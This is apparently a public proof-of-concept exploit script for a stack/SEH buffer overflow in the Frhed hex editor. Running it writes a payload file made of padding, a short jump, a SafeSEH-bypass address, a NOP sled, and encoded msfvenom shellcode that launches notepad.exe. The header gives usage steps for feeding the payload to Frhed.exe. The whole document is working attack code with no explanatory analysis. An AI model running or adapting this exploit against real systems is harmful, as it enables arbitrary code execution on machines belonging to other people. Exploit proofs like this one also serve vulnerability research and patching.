#Celal Dogan DURAN - ZAYOTEM

#run the exploit.py and copy the payload. Open cmd where Frhed.exe is located, then run Frhed.exe with payload arguement.

f = open("payload.txt","wb")    


padding = 494 * b"A"  

jmp = b"\xEB\x1E\x90\x90"           # Jump forward 32 bytes to pass bytes in memory that corrupts the shellcode.


                                    #  \Device\HarddiskVolume3\Windows\Fonts\StaticCache.dat
                                    
outrange = b"\x18\xB1\xD1\x03"      # To bypass SafeSEH protection jumping out of SafeSEH scope address.  03XXB118 -> call dword ptr ss:[ebp+C]

                                    # The third  byte  is changes every start because of ASLR. So when D1 byte matches, exploit works successfull                      

send = 2000 * b"D"                  # Blocking the box for the error message

nop = 50 * b"\x90"


# -------


#buf = msfvenom -p windows/exec cmd=notepad.exe -f c -e x86/alpha_mixed
buf =  b""
buf += b"\x89\xe1\xda\xd8\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x7a\x48\x4c"
buf += b"\x42\x57\x70\x33\x30\x67\x70\x43\x50\x6e\x69\x4a\x45"
buf += b"\x76\x51\x79\x50\x42\x44\x6e\x6b\x66\x30\x64\x70\x4c"
buf += b"\x4b\x36\x32\x46\x6c\x4e\x6b\x61\x42\x57\x64\x6e\x6b"
buf += b"\x32\x52\x35\x78\x34\x4f\x4f\x47\x62\x6a\x66\x46\x46"
buf += b"\x51\x49\x6f\x4e\x4c\x75\x6c\x63\x51\x43\x4c\x63\x32"
buf += b"\x34\x6c\x77\x50\x6a\x61\x78\x4f\x64\x4d\x53\x31\x68"
buf += b"\x47\x38\x62\x6a\x52\x76\x32\x61\x47\x4e\x6b\x72\x72"
buf += b"\x34\x50\x4e\x6b\x72\x6a\x65\x6c\x4e\x6b\x62\x6c\x67"
buf += b"\x61\x62\x58\x7a\x43\x77\x38\x47\x71\x6e\x31\x62\x71"
buf += b"\x4e\x6b\x30\x59\x57\x50\x56\x61\x78\x53\x4c\x4b\x63"
buf += b"\x79\x36\x78\x49\x73\x65\x6a\x42\x69\x6e\x6b\x76\x54"
buf += b"\x6c\x4b\x66\x61\x7a\x76\x45\x61\x4b\x4f\x4e\x4c\x5a"
buf += b"\x61\x68\x4f\x56\x6d\x46\x61\x6f\x37\x47\x48\x49\x70"
buf += b"\x74\x35\x68\x76\x55\x53\x61\x6d\x7a\x58\x55\x6b\x61"
buf += b"\x6d\x74\x64\x50\x75\x69\x74\x51\x48\x6e\x6b\x61\x48"
buf += b"\x56\x44\x63\x31\x38\x53\x75\x36\x4c\x4b\x64\x4c\x70"
buf += b"\x4b\x4e\x6b\x46\x38\x67\x6c\x57\x71\x58\x53\x4c\x4b"
buf += b"\x36\x64\x4e\x6b\x53\x31\x38\x50\x4f\x79\x77\x34\x65"
buf += b"\x74\x65\x74\x43\x6b\x71\x4b\x73\x51\x70\x59\x72\x7a"
buf += b"\x30\x51\x69\x6f\x69\x70\x61\x4f\x63\x6f\x52\x7a\x4c"
buf += b"\x4b\x36\x72\x38\x6b\x6c\x4d\x61\x4d\x70\x6a\x55\x51"
buf += b"\x6e\x6d\x6b\x35\x4d\x62\x65\x50\x47\x70\x73\x30\x66"
buf += b"\x30\x70\x68\x74\x71\x6c\x4b\x70\x6f\x4f\x77\x49\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x4e\x55\x4e\x42\x56\x36\x42"
buf += b"\x48\x4d\x76\x6f\x65\x4f\x4d\x4d\x4d\x39\x6f\x58\x55"
buf += b"\x47\x4c\x36\x66\x63\x4c\x77\x7a\x6f\x70\x49\x6b\x79"
buf += b"\x70\x72\x55\x57\x75\x6d\x6b\x50\x47\x75\x43\x74\x32"
buf += b"\x62\x4f\x53\x5a\x53\x30\x71\x43\x79\x6f\x58\x55\x30"
buf += b"\x6e\x72\x4f\x30\x74\x53\x55\x34\x30\x31\x71\x62\x44"
buf += b"\x54\x6e\x32\x45\x70\x78\x71\x75\x75\x50\x41\x41"


f.write(padding+jmp +outrange + nop + buf + send)
f.close()